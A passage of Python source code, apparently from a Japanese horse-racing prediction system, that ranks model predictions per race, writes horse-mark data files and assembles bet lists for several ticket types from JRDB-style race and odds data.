pd.merge(race_table_base_df, raceuma_table_base_df, on=\"RACE_KEY\")\n result_df.loc[:, \"距離\"] = result_df[\"距離\"].astype(int)\n\n cluster_raceuma_result_df = self.tf.cluster_raceuma_result_df(result_df, self.dict_path)\n factory_analyze_race_result_df = self.tf.factory_analyze_race_result_df(result_df, self.dict_path)\n\n raceuma_result_df = cluster_raceuma_result_df[[\"RACE_KEY\", \"UMABAN\", \"ru_cluster\", \"IDM結果\", \"レース馬コメント\"]]\n race_result_df = factory_analyze_race_result_df[\n [\"RACE_KEY\", \"target_date\", \"fa_1\", \"fa_2\", \"fa_3\", \"fa_4\", \"fa_5\", \"RAP_TYPE\", \"TRACK_BIAS_ZENGO\",\n \"TRACK_BIAS_UCHISOTO\", \"レースペース流れ\", \"レースコメント\"]]\n\n race_result_df.loc[:, \"val\"] = race_result_df[\"RAP_TYPE\"].apply(\n lambda x: mu.decode_rap_type(int(mu.encode_rap_type(x))))\n race_result_df.loc[:, \"TB_ZENGO\"] = race_result_df[\"TRACK_BIAS_ZENGO\"].apply(\n lambda x: mu._decode_zengo_bias(int(mu._encode_zengo_bias(x))))\n race_result_df.loc[:, \"TB_UCHISOTO\"] = race_result_df[\"TRACK_BIAS_UCHISOTO\"].apply(\n lambda x: mu._decode_uchisoto_bias(int(mu._calc_uchisoto_bias(x))))\n race_result_df.loc[:, \"RACE_PACE\"] = race_result_df[\"レースペース流れ\"].apply(\n lambda x: mu._decode_race_pace(int(mu._encode_race_pace(x))))\n race_result_df.loc[:, \"TB\"] = race_result_df.apply(lambda x: mu.convert_bias(x[\"TB_UCHISOTO\"], x[\"TB_ZENGO\"]),\n axis=1)\n race_result_df = race_result_df.groupby(\"RACE_KEY\").first().reset_index()\n race_result_df = pd.merge(race_result_df, self.race_base_df, on=\"RACE_KEY\")\n\n result_uchisoto_df = race_result_df[[\"RACE_KEY\", \"TB_UCHISOTO\", \"file_id\", \"nichiji\", \"race_no\"]].rename(\n columns={\"TB_UCHISOTO\": \"val\"})\n result_zengo_df = race_result_df[[\"RACE_KEY\", \"TB_ZENGO\", \"file_id\", \"nichiji\", \"race_no\"]].rename(\n columns={\"TB_ZENGO\": \"val\"})\n result_tb_df = race_result_df[[\"RACE_KEY\", \"TB\", \"file_id\", \"nichiji\", \"race_no\"]].rename(columns={\"TB\": \"val\"})\n\n raceuma_result_df = pd.merge(raceuma_result_df, race_result_df, on=\"RACE_KEY\")\n\n raceuma_result_df.loc[:, \"RACEUMA_ID\"] = raceuma_result_df.apply(\n lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"target_date\"]) + x[\"UMABAN\"], axis=1)\n fa_df = raceuma_result_df[[\"RACEUMA_ID\", \"fa_1\", \"fa_2\", \"fa_3\", \"fa_4\", \"fa_5\", \"target_date\"]]\n self.race_result_df = race_result_df\n self.raceuma_result_df = raceuma_result_df\n\n def set_pred_df(self):\n win5_df = self.get_pred_df(\"win5\", \"WIN5_FLAG\")\n win5_df.loc[:, \"RACEUMA_ID\"] = win5_df.apply(\n lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"target_date\"]) + x[\"UMABAN\"], axis=1)\n win5_df.loc[:, \"predict_std\"] = round(win5_df[\"predict_std\"], 2)\n win5_df.loc[:, \"predict_rank\"] = win5_df[\"predict_rank\"].astype(int)\n\n win_df = self.get_pred_df(\"win\", \"WIN_FLAG\")\n win_df.loc[:, \"RACEUMA_ID\"] = win_df.apply(\n lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"target_date\"]) + x[\"UMABAN\"], axis=1)\n win_df.loc[:, \"predict_std\"] = round(win_df[\"predict_std\"], 2)\n win_df.loc[:, \"predict_rank\"] = win_df[\"predict_rank\"].astype(int)\n\n jiku_df = self.get_pred_df(\"win\", \"JIKU_FLAG\")\n jiku_df.loc[:, \"RACEUMA_ID\"] = jiku_df.apply(\n lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"target_date\"]) + x[\"UMABAN\"], axis=1)\n jiku_df.loc[:, \"predict_std\"] = round(jiku_df[\"predict_std\"], 2)\n jiku_df.loc[:, \"predict_rank\"] = jiku_df[\"predict_rank\"].astype(int)\n\n ana_df = self.get_pred_df(\"win\", \"ANA_FLAG\")\n ana_df.loc[:, \"RACEUMA_ID\"] = ana_df.apply(\n lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"target_date\"]) + x[\"UMABAN\"], axis=1)\n ana_df.loc[:, \"predict_std\"] = round(ana_df[\"predict_std\"], 2)\n ana_df.loc[:, \"predict_rank\"] = ana_df[\"predict_rank\"].astype(int)\n score_df = pd.merge(win_df[[\"RACE_KEY\", \"UMABAN\", \"RACEUMA_ID\", \"predict_std\", \"target_date\"]].rename(\n columns={\"predict_std\": \"win_std\"}),\n jiku_df[[\"RACEUMA_ID\", \"predict_std\"]].rename(columns={\"predict_std\": \"jiku_std\"}),\n on=\"RACEUMA_ID\")\n score_df = pd.merge(score_df, ana_df[[\"RACEUMA_ID\", \"predict_std\"]].rename(columns={\"predict_std\": \"ana_std\"}),\n on=\"RACEUMA_ID\")\n score_df.loc[:, \"predict_std\"] = score_df[\"win_std\"] * self.win_rate / 100 + score_df[\"jiku_std\"] * self.jiku_rate / 100 + score_df[\"ana_std\"] * self.ana_rate / 100\n grouped_score_df = score_df.groupby(\"RACE_KEY\")\n score_df.loc[:, \"predict_rank\"] = grouped_score_df[\"predict_std\"].rank(\"dense\", ascending=False)\n score_df.loc[:, \"predict_std\"] = round(score_df[\"predict_std\"], 2)\n score_df.loc[:, \"predict_rank\"] = score_df[\"predict_rank\"].astype(int)\n nigeuma_df = self.get_pred_df(\"nigeuma\", \"NIGEUMA\")\n nigeuma_df.loc[:, \"RACEUMA_ID\"] = nigeuma_df.apply(\n lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"target_date\"]) + x[\"UMABAN\"], axis=1)\n nigeuma_df.loc[:, \"predict_std\"] = round(nigeuma_df[\"predict_std\"], 2)\n nigeuma_df.loc[:, \"predict_rank\"] = nigeuma_df[\"predict_rank\"].astype(int)\n agari_df = self.get_pred_df(\"nigeuma\", \"AGARI_SAISOKU\")\n agari_df.loc[:, \"RACEUMA_ID\"] = agari_df.apply(\n lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"target_date\"]) + x[\"UMABAN\"], axis=1)\n agari_df.loc[:, \"predict_std\"] = round(agari_df[\"predict_std\"], 2)\n agari_df.loc[:, \"predict_rank\"] = agari_df[\"predict_rank\"].astype(int)\n ten_df = self.get_pred_df(\"nigeuma\", \"TEN_SAISOKU\")\n ten_df.loc[:, \"RACEUMA_ID\"] = ten_df.apply(\n lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"target_date\"]) + x[\"UMABAN\"], axis=1)\n ten_df.loc[:, \"predict_std\"] = round(ten_df[\"predict_std\"], 2)\n ten_df.loc[:, \"predict_rank\"] = ten_df[\"predict_rank\"].astype(int)\n self.win5_df = win5_df\n self.win_df = win_df\n self.jiku_df = jiku_df\n self.ana_df = ana_df\n self.score_df = score_df\n self.nigeuma_df = nigeuma_df\n self.agari_df = agari_df\n self.ten_df = ten_df\n total_df = pd.concat([win_df, jiku_df, ana_df, nigeuma_df, agari_df, ten_df])[[\"RACE_KEY\", \"UMABAN\", \"target_date\", \"predict_rank\"]]\n point_df = total_df.copy()\n point_df.loc[:, \"predict_rank\"] = point_df[\"predict_rank\"].apply(lambda x: 5 if x == 1 else 4 if x == 2 else 3 if x == 3 else 2 if x == 4 else 1 if x == 5 else 0)\n ## 単純に順位が少ないものを評価\n total_df = total_df.groupby([\"RACE_KEY\", \"UMABAN\", \"target_date\"]).sum().reset_index()\n total_df.columns = [\"RACE_KEY\", \"UMABAN\", \"target_date\", \"VALUE\"]\n total_df.loc[:, \"predict_rank\"] = total_df.groupby(\"RACE_KEY\")[\"VALUE\"].rank(method='min')\n self.total_df = total_df\n\n ## 順位上位のものにpointをつけて評価\n point_df = point_df.groupby([\"RACE_KEY\", \"UMABAN\", \"target_date\"]).sum().reset_index()\n point_df.columns = [\"RACE_KEY\", \"UMABAN\", \"target_date\", \"VALUE\"]\n point_df.loc[:, \"predict_rank\"] = point_df.groupby(\"RACE_KEY\")[\"VALUE\"].rank(ascending=False, method='min')\n self.point_df = point_df\n\n def create_raceuma_score_file(self):\n for date in self.date_list:\n print(date)\n win5_temp_df = self.win5_df.query(f\"target_date == '{date}'\")[\n [\"RACEUMA_ID\", \"prob\", \"predict_rank\"]].sort_values(\"RACEUMA_ID\")\n win5_temp_df.loc[:, \"prob\"] = (win5_temp_df[\"prob\"] * 100 ).astype(\"int\")\n win5_temp_df.to_csv(self.ext_score_path + \"pred_win5/\" + date + \".csv\", header=False, index=False)\n\n win_temp_df = self.win_df.query(f\"target_date == '{date}'\")[\n [\"RACEUMA_ID\", \"prob\", \"predict_rank\"]].sort_values(\"RACEUMA_ID\")\n win_temp_df.loc[:, \"prob\"] = (win_temp_df[\"prob\"] * 100 ).astype(\"int\")\n win_temp_df.to_csv(self.ext_score_path + \"pred_win/\" + date + \".csv\", header=False, index=False)\n jiku_temp_df = self.jiku_df.query(f\"target_date == '{date}'\")[\n [\"RACEUMA_ID\", \"prob\", \"predict_rank\"]].sort_values(\"RACEUMA_ID\")\n jiku_temp_df.loc[:, \"prob\"] = (jiku_temp_df[\"prob\"] * 100 ).astype(\"int\")\n jiku_temp_df.to_csv(self.ext_score_path + \"pred_jiku/\" + date + \".csv\", header=False, index=False)\n ana_temp_df = self.ana_df.query(f\"target_date == '{date}'\")[\n [\"RACEUMA_ID\", \"prob\", \"predict_rank\"]].sort_values(\"RACEUMA_ID\")\n ana_temp_df.loc[:, \"prob\"] = (ana_temp_df[\"prob\"] * 100 ).astype(\"int\")\n ana_temp_df.to_csv(self.ext_score_path + \"pred_ana/\" + date + \".csv\", header=False, index=False)\n score_temp_df = self.score_df.query(f\"target_date == '{date}'\")[\n [\"RACEUMA_ID\", \"predict_std\", \"predict_rank\"]].sort_values(\"RACEUMA_ID\")\n score_temp_df.loc[:, \"predict_std\"] = score_temp_df[\"predict_std\"].round(0).astype(\"int\")\n score_temp_df.to_csv(self.ext_score_path + \"pred_score/\" + date + \".csv\", header=False, index=False)\n nigeuma_temp_df = self.nigeuma_df.query(f\"target_date == '{date}'\")[\n [\"RACEUMA_ID\", \"predict_std\", \"predict_rank\"]].sort_values(\"RACEUMA_ID\")\n nigeuma_temp_df.to_csv(self.ext_score_path + \"pred_nige/\" + date + \".csv\", header=False, index=False)\n agari_temp_df = self.agari_df.query(f\"target_date == '{date}'\")[\n [\"RACEUMA_ID\", \"predict_std\", \"predict_rank\"]].sort_values(\"RACEUMA_ID\")\n agari_temp_df.to_csv(self.ext_score_path + \"pred_agari/\" + date + \".csv\", header=False, index=False)\n ten_temp_df = self.ten_df.query(f\"target_date == '{date}'\")[\n [\"RACEUMA_ID\", \"predict_std\", \"predict_rank\"]].sort_values(\"RACEUMA_ID\")\n ten_temp_df.to_csv(self.ext_score_path + \"pred_ten/\" + date + \".csv\", header=False, index=False)\n\n def create_main_mark_file(self):\n umaren_are_df = self.get_pred_df(\"haito\", \"UMAREN_ARE\")[[\"RACE_KEY\", \"pred\"]].rename(\n columns={\"pred\": \"umaren_are\"})\n umatan_are_df = self.get_pred_df(\"haito\", \"UMATAN_ARE\")[[\"RACE_KEY\", \"pred\"]].rename(\n columns={\"pred\": \"umatan_are\"})\n sanrenpuku_are_df = self.get_pred_df(\"haito\", \"SANRENPUKU_ARE\")[[\"RACE_KEY\", \"pred\"]].rename(\n columns={\"pred\": \"sanrenpuku_are\"})\n are_df = pd.merge(umaren_are_df, umatan_are_df, on=\"RACE_KEY\")\n are_df = pd.merge(are_df, sanrenpuku_are_df, on=\"RACE_KEY\")\n are_df = pd.merge(self.race_base_df, are_df, on=\"RACE_KEY\", how=\"left\")\n are_df.loc[:, \"val\"] = are_df.apply(\n lambda x: mu.convert_are_flag(x[\"umaren_are\"], x[\"umatan_are\"], x[\"sanrenpuku_are\"]), axis=1)\n\n main_raceuma_df = pd.merge(self.score_df, self.race_base_df, on =\"RACE_KEY\")\n \"\"\" 馬1、レース1用のファイルを作成 \"\"\"\n for file in self.file_list:\n print(file)\n file_text = \"\"\n temp_df = self.race_base_df.query(f\"file_id == '{file}'\")\n nichiji_list = sorted(temp_df[\"nichiji\"].drop_duplicates())\n for nichiji in nichiji_list:\n temp2_df = temp_df.query(f\"nichiji == '{nichiji}'\")\n race_list = sorted(temp2_df[\"RACE_KEY\"].drop_duplicates())\n for race in race_list:\n line_text = \"\"\n temp_race_df = are_df.query(f\"RACE_KEY =='{race}'\")\n if not temp_race_df.empty:\n temp3_sr = temp_race_df.iloc[0]\n if temp3_sr[\"val\"] == temp3_sr[\"val\"]:\n line_text += temp3_sr[\"val\"]\n else:\n line_text += \" \"\n else:\n line_text += \" \"\n temp3_df = main_raceuma_df.query(f\"RACE_KEY == '{race}'\").sort_values(\"UMABAN\")\n i = 0\n for idx, val in temp3_df.iterrows():\n line_text += self._return_mark(val[\"predict_rank\"])\n i += 1\n if i != 18:\n for j in range(i, 18):\n line_text += \" \"\n file_text += line_text + '\\r\\n'\n with open(self.target_path + \"UM\" + file + \".DAT\", mode='w', encoding=\"shift-jis\") as f:\n f.write(file_text.replace('\\r', ''))\n\n\n def create_raceuma_mark_file(self):\n print(\"---- WIN5マーク --------\")\n mark_path_2 = self.target_path + \"UmaMark2/\"\n self._proc_create_um_mark_file(self.win5_df, mark_path_2)\n print(\"---- pointマーク --------\")\n mark_path_3 = self.target_path + \"UmaMark3/\"\n self._proc_create_um_mark_file(self.point_df, mark_path_3)\n print(\"---- 勝ちマーク --------\")\n mark_path_4 = self.target_path + \"UmaMark4/\"\n self._proc_create_um_mark_file(self.win_df, mark_path_4)\n print(\"---- 軸マーク --------\")\n mark_path_5 = self.target_path + \"UmaMark5/\"\n self._proc_create_um_mark_file(self.jiku_df, mark_path_5)\n print(\"---- nigeuma_df --------\")\n mark_path_6 = self.target_path + \"UmaMark6/\"\n self._proc_create_um_mark_file(self.nigeuma_df, mark_path_6)\n print(\"---- agari_df --------\")\n mark_path_7 = self.target_path + \"UmaMark7/\"\n self._proc_create_um_mark_file(self.agari_df, mark_path_7)\n print(\"---- 穴マーク --------\")\n mark_path_8 = self.target_path + \"UmaMark8/\"\n self._proc_create_um_mark_file(self.ana_df, mark_path_8)\n\n def _proc_create_um_mark_file(self, df, folder_path):\n \"\"\" ランクを印にして馬印ファイルを作成 \"\"\"\n df.loc[:, \"RACEUMA_ID\"] = df.apply(\n lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"target_date\"]) + x[\"UMABAN\"], axis=1)\n #df.loc[:, \"predict_std\"] = df[\"predict_std\"].round(2)\n df.loc[:, \"predict_rank\"] = df[\"predict_rank\"].astype(int)\n df = pd.merge(self.race_base_df[[\"RACE_KEY\", \"file_id\", \"nichiji\", \"race_no\"]], df, on=\"RACE_KEY\", how=\"left\")\n # file_list = df[\"file_id\"].drop_duplicates()\n for file in self.file_list:\n print(file)\n file_text = \"\"\n temp_df = df.query(f\"file_id == '{file}'\")\n nichiji_list = sorted(temp_df[\"nichiji\"].drop_duplicates())\n for nichiji in nichiji_list:\n temp2_df = temp_df.query(f\"nichiji == '{nichiji}'\")\n race_list = sorted(temp2_df[\"RACE_KEY\"].drop_duplicates())\n for race in race_list:\n line_text = \" \"\n temp3_df = temp2_df.query(f\"RACE_KEY == '{race}'\").sort_values(\"UMABAN\")\n i = 0\n for idx, val in temp3_df.iterrows():\n line_text += self._return_mark(val[\"predict_rank\"])\n i += 1\n if i != 18:\n for j in range(i, 18):\n line_text += \" \"\n file_text += line_text + '\\r\\n'\n with open(folder_path + \"UM\" + file + \".DAT\", mode='w', encoding=\"shift-jis\") as f:\n f.write(file_text.replace('\\r', ''))\n\n def create_target_mark_df(self):\n base_df = pd.concat([self.win_df, self.jiku_df, self.ana_df])\n mark_base_df = base_df[[\"RACE_KEY\", \"UMABAN\", \"target\", \"predict_std\"]].copy()\n mark_base_df = mark_base_df.set_index([\"RACE_KEY\", \"UMABAN\", \"target\"]).unstack(\"target\")\n mark_base_df.columns = [\"ANA_FLAG\", \"JIKU_FLAG\", \"WIN_FLAG\"]\n mark_base_df = mark_base_df.reset_index()\n mark_df = mark_base_df.copy()\n mark_df.loc[:, \"SCORE\"] = mark_df[\"WIN_FLAG\"] * self.win_rate / 100 + mark_base_df[\"JIKU_FLAG\"] / 100 * self.jiku_rate + mark_base_df[\"ANA_FLAG\"] * self.ana_rate / 100\n mark_df.loc[:, \"RANK\"] = mark_df.groupby(\"RACE_KEY\")[\"SCORE\"].rank(ascending=False)\n mark_prob_df = base_df[[\"RACE_KEY\", \"UMABAN\", \"target\", \"prob\"]].copy()\n mark_prob_df = mark_prob_df.set_index([\"RACE_KEY\", \"UMABAN\", \"target\"]).unstack(\"target\")\n mark_prob_df.columns = [\"ana_prob\", \"jiku_prob\", \"win_prob\"]\n mark_prob_df = mark_prob_df.reset_index()\n self.target_mark_df = pd.merge(mark_df, mark_prob_df, on=[\"RACE_KEY\", \"UMABAN\"])\n\n race_df = self.ext.get_race_before_table_base()\n base_term_df = race_df.query(f\"NENGAPPI >= '{self.term_start_date}' and NENGAPPI <= '{self.term_end_date}'\")[[\"RACE_KEY\"]].copy()\n self.race_df = race_df[[\"RACE_KEY\", \"距離\", \"芝ダ障害コード\", \"種別\", \"条件\", \"天候コード\", \"芝馬場状態コード\", \"ダ馬場状態コード\", \"target_date\"]].copy()\n self.race_df.loc[:, \"年月\"] = self.race_df[\"target_date\"].str[0:6]\n self.race_df = pd.merge(self.race_df, base_term_df, on=\"RACE_KEY\")\n\n res_raceuma_df = self.ext.get_raceuma_table_base()[[\"RACE_KEY\", \"UMABAN\", \"着順\", \"確定単勝オッズ\", \"確定単勝人気順位\", \"レース脚質\", \"単勝\", \"複勝\", \"テン指数結果順位\", \"上がり指数結果順位\"]].copy()\n self.res_raceuma_df = res_raceuma_df\n\n def create_vote_file(self):\n target_df = self.target_mark_df.copy()\n print(target_df.shape)\n print(target_df.iloc[0])\n sim = Simulation(self.start_date, self.end_date, False, target_df)\n tansho_target_bet_df = pd.DataFrame(); fukusho_target_bet_df = pd.DataFrame(); umaren_target_bet_df = pd.DataFrame()\n umatan_target_bet_df = pd.DataFrame(); wide_target_bet_df = pd.DataFrame(); sanrenpuku_target_bet_df = pd.DataFrame()\n print(\"--- tansho ----\")\n if self.tansho_flag:\n print(f\" 条件: {self.tansho_cond} オッズ:{self.tansho_odds_cond}\")\n tansho_kaime_df = sim.create_tansho_base_df(self.tansho_cond)\n print(tansho_kaime_df.shape)\n tansho_target_bet_df = self._get_tansho_bet_df(tansho_kaime_df)\n print(tansho_target_bet_df.shape)\n print(\"--- fukusho ----\")\n if self.fukusho_flag:\n print(f\" 条件: {self.fukusho_cond} オッズ:{self.fukusho_odds_cond}\")\n fukusho_kaime_df = sim.create_fukusho_base_df(self.fukusho_cond)\n print(fukusho_kaime_df.shape)\n fukusho_target_bet_df = self._get_fukusho_bet_df(fukusho_kaime_df)\n print(fukusho_target_bet_df.shape)\n print(\"--- umaren ----\")\n if self.umaren_flag:\n print(f\" 条件: {self.umaren1_cond}/ {self.umaren2_cond} オッズ:{self.umaren_odds_cond}\")\n umaren_kaime_df = sim.create_umaren_base_df(self.umaren1_cond, self.umaren2_cond)\n print(umaren_kaime_df.shape)\n umaren_target_bet_df = self._get_umaren_bet_df(umaren_kaime_df)\n print(umaren_target_bet_df.shape)\n print(\"--- umatan ----\")\n if self.umatan_flag:\n print(f\" 条件: {self.umatan1_cond}/ {self.umatan2_cond} オッズ:{self.umatan_odds_cond}\")\n umatan_kaime_df = sim.create_umatan_base_df(self.umatan1_cond, self.umatan2_cond)\n print(umatan_kaime_df.shape)\n umatan_target_bet_df = self._get_umatan_bet_df(umatan_kaime_df)\n print(umatan_target_bet_df.shape)\n print(\"--- wide ----\")\n if self.wide_flag:\n print(f\" 条件: {self.wide1_cond}/ {self.wide2_cond} オッズ:{self.wide_odds_cond}\")\n wide_kaime_df = sim.create_wide_base_df(self.wide1_cond, self.wide2_cond)\n print(wide_kaime_df.shape)\n wide_target_bet_df = self._get_wide_bet_df(wide_kaime_df)\n print(wide_target_bet_df.shape)\n print(\"--- sanrenpuku ----\")\n if self.sanrenpuku_flag:\n print(f\" 条件: {self.sanrenpuku1_cond}/ {self.sanrenpuku2_cond}/ {self.sanrenpuku3_cond} オッズ:{self.sanrenpuku_odds_cond}\")\n sanrenpuku_kaime_df = sim.create_sanrenpuku_base_df(self.sanrenpuku1_cond, self.sanrenpuku2_cond, self.sanrenpuku3_cond)\n sanrenpuku_target_bet_df = self._get_sanrenpuku_bet_df(sanrenpuku_kaime_df)\n print(sanrenpuku_target_bet_df.shape)\n target_bet_df = pd.concat([tansho_target_bet_df, fukusho_target_bet_df, umaren_target_bet_df, umatan_target_bet_df, wide_target_bet_df, sanrenpuku_target_bet_df])\n target_bet_df = target_bet_df.sort_values([\"RACE_ID\", \"エリア\", \"券種\", \"購入金額\", \"目1\", \"目2\", \"目3\"])\n target_bet_df = target_bet_df.drop_duplicates(subset=[\"RACE_ID\", \"券種\", \"目1\", \"目2\", \"目3\"])\n target_bet_df.to_csv(self.auto_bet_path + \"target_bet.csv\", index=False, header=False)\n self.target_bet_df = target_bet_df\n\n def _get_tansho_bet_df(self, kaime_df):\n if len(kaime_df.index) == 0:\n print(\"_get_tansho_bet_df -- no data--\")\n return pd.DataFrame(columns=self.kaime_columns)\n # tansho_base_df = self.get_tansho_target_df(target_df)\n bet_df = kaime_df.query(self.tansho_odds_cond).copy()\n if len(bet_df.index) == 0:\n return pd.DataFrame(columns=self.kaime_columns)\n else:\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN\"]\n bet_df.loc[:, \"目2\"] =\"\"\n bet_df.loc[:, \"目3\"] =\"\"\n bet_df.loc[:, \"券種\"] = '0'\n # bet_df.loc[:, \"オッズ\"] = bet_df[\"単勝オッズ\"]\n target_bet_df = self._get_target_bet_df(bet_df)\n return target_bet_df\n\n def _get_fukusho_bet_df(self, kaime_df):\n if len(kaime_df.index) == 0:\n print(\"_get_fukusho_bet_df -- no data--\")\n return pd.DataFrame(columns=self.kaime_columns)\n # tansho_base_df = self.get_fukusho_target_df(target_df)\n bet_df = kaime_df.query(self.fukusho_odds_cond).copy()\n if len(bet_df.index) == 0:\n return pd.DataFrame(columns=self.kaime_columns)\n else:\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN\"]\n bet_df.loc[:, \"目2\"] =\"\"\n bet_df.loc[:, \"目3\"] =\"\"\n bet_df.loc[:, \"券種\"] = '1'\n # bet_df.loc[:, \"オッズ\"] = bet_df[\"複勝オッズ\"]\n target_bet_df = self._get_target_bet_df(bet_df)\n return target_bet_df\n\n def _get_umaren_bet_df(self, kaime_df):\n if len(kaime_df.index) == 0:\n print(\"_get_umaren_bet_df -- no data--\")\n return pd.DataFrame(columns=self.kaime_columns)\n #umaren_base_df = self.get_umaren_target_df(uma1_df, uma2_df)\n bet_df = kaime_df.query(self.umaren_odds_cond).copy()\n if len(bet_df.index) == 0:\n return pd.DataFrame(columns=self.kaime_columns)\n else:\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN\"].apply(lambda x: x[0])\n bet_df.loc[:, \"目2\"] =bet_df[\"UMABAN\"].apply(lambda x: x[1])\n bet_df.loc[:, \"目3\"] =\"\"\n bet_df.loc[:, \"券種\"] = '3'\n target_bet_df = self._get_target_bet_df(bet_df)\n return target_bet_df\n\n def _get_umatan_bet_df(self, kaime_df):\n if len(kaime_df.index) == 0:\n print(\"_get_umatan_bet_df -- no data--\")\n return pd.DataFrame(columns=self.kaime_columns)\n # umatan_base_df = self.get_umatan_target_df(uma1_df, uma2_df)\n bet_df = kaime_df.query(self.umatan_odds_cond).copy()\n if len(bet_df.index) == 0:\n return pd.DataFrame(columns=self.kaime_columns)\n else:\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN\"].apply(lambda x: x[0])\n bet_df.loc[:, \"目2\"] =bet_df[\"UMABAN\"].apply(lambda x: x[1])\n bet_df.loc[:, \"目3\"] =\"\"\n bet_df.loc[:, \"券種\"] = '5'\n target_bet_df = self._get_target_bet_df(bet_df)\n return target_bet_df\n\n def _get_wide_bet_df(self, kaime_df):\n if len(kaime_df.index) == 0:\n print(\"_get_wide_bet_df -- no data--\")\n return pd.DataFrame(columns=self.kaime_columns)\n #wide_base_df = self.get_wide_target_df(uma1_df, uma2_df)\n bet_df = kaime_df.query(self.wide_odds_cond).copy()\n if len(bet_df.index) == 0:\n return pd.DataFrame(columns=self.kaime_columns)\n else:\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN\"].apply(lambda x: x[0])\n bet_df.loc[:, \"目2\"] =bet_df[\"UMABAN\"].apply(lambda x: x[1])\n bet_df.loc[:, \"目3\"] =\"\"\n bet_df.loc[:, \"券種\"] = '4'\n target_bet_df = self._get_target_bet_df(bet_df)\n return target_bet_df\n\n def _get_sanrenpuku_bet_df(self, kaime_df):\n if len(kaime_df.index) == 0:\n print(\"_get_sanrenpuku_bet_df -- no data--\")\n return pd.DataFrame(columns=self.kaime_columns)\n #sanrenpuku_base_df = self.get_sanrenpuku_target_df(uma1_df, uma2_df, uma3_df)\n bet_df = kaime_df.query(self.sanrenpuku_odds_cond).copy()\n if len(bet_df.index) == 0:\n return pd.DataFrame(columns=self.kaime_columns)\n else:\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN\"].apply(lambda x: x[0])\n bet_df.loc[:, \"目2\"] =bet_df[\"UMABAN\"].apply(lambda x: x[1])\n bet_df.loc[:, \"目3\"] =bet_df[\"UMABAN\"].apply(lambda x: x[2])\n bet_df.loc[:, \"券種\"] = '6'\n target_bet_df = self._get_target_bet_df(bet_df)\n return target_bet_df\n\n def get_tansho_target_df(self, uma1_df):\n add_uma1_df = pd.merge(uma1_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"])\n odds_df = self.ext.get_odds_df(\"単勝\")\n odds_df = odds_df[[\"RACE_KEY\", \"UMABAN\", \"単勝オッズ\"]]\n target_df = pd.merge(add_uma1_df, odds_df, on=[\"RACE_KEY\", \"UMABAN\"])\n return target_df\n\n def get_fukusho_target_df(self, uma1_df):\n add_uma1_df = pd.merge(uma1_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"])\n odds_df = self.ext.get_odds_df(\"複勝\")\n odds_df = odds_df[[\"RACE_KEY\", \"UMABAN\", \"複勝オッズ\"]]\n target_df = pd.merge(add_uma1_df, odds_df, on=[\"RACE_KEY\", \"UMABAN\"])\n return target_df\n\n def get_umaren_target_df(self, uma1_df, uma2_df):\n add_uma1_df = pd.merge(uma1_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"_1\").rename(columns={\"RACE_KEY_1\":\"RACE_KEY\"})\n add_uma2_df = pd.merge(uma2_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"_2\").rename(columns={\"RACE_KEY_2\":\"RACE_KEY\"})\n odds_df = self.ext.get_odds_df(\"馬連\")\n base_uma1_df = pd.merge(uma1_df[[\"RACE_KEY\", \"UMABAN\"]], odds_df, on=[\"RACE_KEY\", \"UMABAN\"]).set_index([\"RACE_KEY\", \"UMABAN\"])\n umaren_uma1_df = base_uma1_df[['馬連オッズ01', '馬連オッズ02', '馬連オッズ03', '馬連オッズ04', '馬連オッズ05', '馬連オッズ06', '馬連オッズ07', '馬連オッズ08', '馬連オッズ09',\n '馬連オッズ10', '馬連オッズ11', '馬連オッズ12', '馬連オッズ13', '馬連オッズ14', '馬連オッズ15', '馬連オッズ16', '馬連オッズ17', '馬連オッズ18']].copy()\n umaren_uma1_df.columns = [\"01\", \"02\", \"03\", \"04\", \"05\", \"06\", \"07\", \"08\", \"09\", \"10\", \"11\", \"12\", \"13\", \"14\", \"15\", \"16\", \"17\", \"18\"]\n umaren_uma1_df = umaren_uma1_df.stack().reset_index()\n umaren_uma1_df.columns = [\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\", \"オッズ\"]\n target_df = pd.merge(umaren_uma1_df, self.race_df, on=\"RACE_KEY\")\n target_df = pd.merge(target_df, add_uma1_df, on=[\"RACE_KEY\", \"UMABAN_1\"])\n target_df = pd.merge(target_df, add_uma2_df, on=[\"RACE_KEY\", \"UMABAN_2\"])\n target_df = target_df.query(\"UMABAN_1 != UMABAN_2\")\n target_df = target_df.drop_duplicates(subset=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\"])\n return target_df\n\n def get_umatan_target_df(self, uma1_df, uma2_df):\n add_uma1_df = pd.merge(uma1_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"_1\").rename(\n columns={\"RACE_KEY_1\": \"RACE_KEY\"})\n add_uma2_df = pd.merge(uma2_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"_2\").rename(\n columns={\"RACE_KEY_2\": \"RACE_KEY\"})\n base_df = pd.merge(add_uma1_df, add_uma2_df, on=\"RACE_KEY\")\n base_df = base_df.query(\"UMABAN_1 != UMABAN_2\")\n odds_df = self.ext.get_odds_df(\"馬単\")\n target_df = pd.merge(base_df, odds_df, on=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\"])\n target_df = pd.merge(target_df, self.race_df, on=[\"RACE_KEY\", \"target_date\"])\n target_df = target_df.rename(columns={\"馬単オッズ\": \"オッズ\"})\n return target_df\n\n def 